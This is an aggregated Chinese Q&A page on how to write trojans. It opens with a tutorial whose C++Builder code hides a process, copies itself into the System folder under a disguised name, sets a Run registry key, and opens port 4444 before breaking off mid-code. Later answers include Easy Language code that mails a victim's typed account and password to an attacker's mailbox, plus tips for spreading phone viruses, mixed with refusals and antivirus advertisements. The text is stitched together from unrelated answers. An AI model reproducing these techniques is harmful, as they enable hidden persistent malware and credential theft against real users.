简单的木马怎么编写啊

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷， 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！要知道，木马（Trojan）的历史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗——先修改你的profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60dll吗？

启动C++Builder 50企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess（）函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32DLL中的鸟函数了。

首先判断目标机的 *** 作系统是Win9x还是WinNt：

{

DWORD dwVersion = GetVersion（）;

// 得到 *** 作系统的版本号

if （dwVersion >= 0x80000000）

// *** 作系统是Win9x，不是WinNt

{

typedef DWORD （CALLBACK LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;

//定义RegisterServiceProcess（）函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary（"KERNEL32"）;

//加载RegisterServiceProcess（）函数所在的动态链接库KERNEL32DLL

lpRegisterServiceProcess = （LPREGISTERSERVICEPROCESS）GetProcAddress（hDLL,"RegisterServiceProcess"）;

//得到RegisterServiceProcess（）函数的地址

lpRegisterServiceProcess（GetCurrentProcessId（）,1）;

//执行RegisterServiceProcess（）函数,隐藏本进程

FreeLibrary（hDLL）;

//卸载动态链接库

}

}

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断 *** 作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。

接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

{

char TempPath[MAX_PATH];

//定义一个变量

GetSystemDirectory（TempPath ,MAX_PATH）;

//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString（TempPath）;

//格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile（ParamStr（0）c_str（）, AnsiString（SystemPath+"\\Tapi32exe"）c_str（） ,FALSE）;

//将自己拷贝到%System%目录下，并改名为Tapi32exe，伪装起来

Registry=new TRegistry;

//定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry->RootKey=HKEY_LOCAL_MACHINE;

//设置主键为HKEY_LOCAL_MACHINE

Registry->OpenKey（"Software\\Microsoft\\Windows\\

CurrentVersion\\Run",TRUE）;

//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

{

//如果以下语句发生异常，跳至catch，以避免程序崩溃

if（Registry->ReadString（"crossbow"）!=SystemPath+"\\Tapi32exe"）

Registry->WriteString（"crossbow",SystemPath+"\\Tapi32exe"）;

//查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32exe

//如果不是，就写入以上键值和内容

}

catch（）

{

//如果有错误，什么也不做

}

}

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

{

FILE fp=NULL;

char content;

int times_of_try;

char TempFile[MAX_PATH];

//定义了一堆待会儿要用到的变量

sprintf（TempFile, "%s%2

这个只是恶作剧程序，不是木马。

其实很简单嘛，只要终止explorerexe进程就行了。

这都不需要编程，只要写个批处理就行。

把：taskkill

/f

/im

Explorerexe写到一个文本文档里，然后把那个文档的后缀名由txt改为bat就行了。

版本 2

支持库 internet

子程序 __启动窗口_创建完毕

局部变量 发送消息, 文本型

发送消息 ＝ “帐号：” ＋ 编辑框1内容 ＋ #换行符 ＋ “密码：” ＋ 编辑框2内容

连接发信服务器 (“smtp126com”, , “这里输入邮箱用户名”, “这里输入邮箱密码”, )

发送邮件 (“恭喜，您盗得了一个XX号！”, 发送消息, “收信人的邮件地址！”, , , “发信人的邮件地址，这个必须为您用来登入的那个邮件的地址！”, )

' 到这里发信就已经完成了！’

手机怎么制作病毒、木马

你这是啥意思？难道 你会开发手机软件吗，我们编写手机软件时加入恶意代码手机运行就会被执行

祝你成功

手机病毒木马制作方法求解。。。

你会开发手机软件吗，我们编写手机软件时加入恶意代码手机运行就会被执行。

怎么制作手机木马

您好！ 手机是无法编写木马程序的，也不建议您编写制作木马程序，木马程序是有很大的安全隐患的哦，然后建议您使用腾讯手机管家保护您的手机的安全吧，您可以使用u 数据线将手机连接到电脑，然后打开腾讯电脑管家的软件管理，在软件管理里面搜索腾讯手机管家，然后选择腾讯手机管家后一键下载安装到手机就可以。

如何让别人的手机中病毒或木马

首先。会制作病毒。然后。绑到TXT里面。然后。发给你要让他中病毒的。手机。然后让他。解压。就ok

手机木马病毒是用电脑制做的吗

这个不一定，现在的手机病毒很猖獗，

手机上网很容易中病毒的，

你可以使用腾讯手机管家查杀一下，

它可以智能扫描，对病毒进行全面查杀；

进入病毒查杀界面；点击底端切换进入

安全防护并且点击病毒查杀；

从而把手机上的病毒查杀的更干净，更彻底。

手机中木马该怎么做？

手机出现静默安装垃圾软件、奇怪图标、广告推送等情况一般都是中毒引起的，可以使用安全软件对手机进行检测，请尝试按照以下步骤进行清除：

安装一个安全类软件，以手机管家为例，打开手机管家。点击首页上的一键体检即可自动查杀系统中的病毒，并自动彻底清除。

若提示无法删除很可能是权限不足导致的，病毒一般都是存在于系统分区中，正常的卸载方式无法卸载，即使是恢复出厂设置也无法将其删除，必须有ROOT权限才能卸载。

获取ROOT权限可以使用电脑端的一键ROOT工具进行，例如：KINGROOT、ROOT精灵等。然后对手机管家进行授权再深度查杀即可彻底删除。

手机可不可以做木马病毒？？？？？应该怎么做

您好：

建议你不要制作或使用手机木马病毒，木马病毒会对您的手机造成损坏的，如果您使用过这种不安全的木马病毒的话，为了您手机的安全建议您使用腾讯手机管家的杀毒功能对您的手机进行全面的杀毒吧，您可以点击这里下载最新版的腾讯手机管家：腾讯手机管家下载

腾讯电脑管家企业平台：zhidaobaidu/c/guanjia/

你好 怎么制作手机木马啊

您好，请不要传播病毒、盗号木马程序，恶意传播病毒和木马会污染互联网环境，请您加入到维护网络安全的大军中！QQ木马程序会导致您和他人的帐号和密码泄露，从而可能使您和他人的QQ财产，如游戏、QB等受到严重威胁，严重的还会违反法律。请您不要轻易安装陌生人传送给您的未知文件，有可能是病毒或者木马。建议您安装腾讯手机管家对您的手机进行实时防护，保护您手机安全运行，避免给您的财产和个人隐私带来威胁。您可以在腾讯电脑管家——应用宝中下载

希望可以帮到您，望采纳。

腾讯电脑管家企业平台：zhidaobaidu/c/guanjia/

求制作手机微信木马病毒

首先得说明白给你听，木马是窃取信息和资料的，病毒是带破坏性，所以这两东西是不一样的，你要的话我可以写个给你

怎么向苹果手机植入木马病毒

病毒不能告诉你，但是 ，手机必须越狱获取权限后，才能植入！

首先得有一个网马生成器

1选择配置好的木马

2填好你的空间地址

3生成3个文件(网马生成器都会清楚的告诉你)

4上传到你的空间里FTP空间

>

您好！

手机是无法编写木马程序的，也不建议您编写制作木马程序，木马程序是有很大的安全隐患的哦，然后建议您使用腾讯手机管家保护您的手机的安全吧，您可以使用usb数据线将手机连接到电脑，然后打开腾讯电脑管家的软件管理，在软件管理里面搜索腾讯手机管家，然后选择腾讯手机管家后一键下载安装到手机就可以。

以上就是关于简单的木马怎么编写啊全部的内容，包括:简单的木马怎么编写啊、怎么编写木马、易语言编写最简单木马程序问题。等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！